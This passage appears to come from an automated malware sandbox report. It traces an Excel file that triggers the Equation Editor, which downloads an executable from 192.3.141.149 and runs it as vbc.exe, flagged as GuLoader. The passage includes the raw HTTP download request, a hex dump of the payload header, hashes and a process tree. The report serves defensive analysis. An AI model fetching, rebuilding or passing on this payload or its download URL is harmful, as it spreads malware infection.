        Sep 15, 2021 11:38:13.044017076 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.044022083 CEST4916780192.168.2.22192.3.141.149
        Sep 15, 2021 11:38:13.044043064 CEST8049167192.3.141.149192.168.2.22
        Sep 15, 2021 11:38:13.044070959 CEST8049167192.3.141.149192.168.2.22

        HTTP Request Dependency Graph

        • 192.3.141.149

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249167192.3.141.14980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        Sep 15, 2021 11:38:12.700417995 CEST0OUTGET /fresh/SENSATIO.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 192.3.141.149
        Connection: Keep-Alive
        Sep 15, 2021 11:38:12.814189911 CEST1INHTTP/1.1 200 OK
        Date: Wed, 15 Sep 2021 09:38:12 GMT
        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
        Last-Modified: Tue, 14 Sep 2021 21:21:52 GMT
        ETag: "1c000-5cbfb2b957c00"
        Accept-Ranges: bytes
        Content-Length: 114688
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 0a b3 4e 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 50 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 42 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 10 00 00 2d e6 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 66 01 00 28 00 00 00 00 80 01 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 5b 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 0a 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 31 00 00 00 80 01 00 00 40 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$u1110~00Rich1PELN`Pp@B-f(1( X.text[` `.data4pp@.rsrc1@@@IMSVBVM60.DLL


        Code Manipulations

        Statistics

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:11:37:24
        Start date:15/09/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13f920000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate

        General

        Start time:11:37:47
        Start date:15/09/2021
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:11:37:48
        Start date:15/09/2021
        Path:C:\Users\Public\vbc.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\Public\vbc.exe'
        Imagebase:0x400000
        File size:114688 bytes
        MD5 hash:C10CEF2B31864B5F9FB13B9AF78765B2
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.690715580.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
        Antivirus matches:
        • Detection: 21%, Virustotal, Browse
        Reputation:low

        Disassembly

        Code Analysis

        Reset < >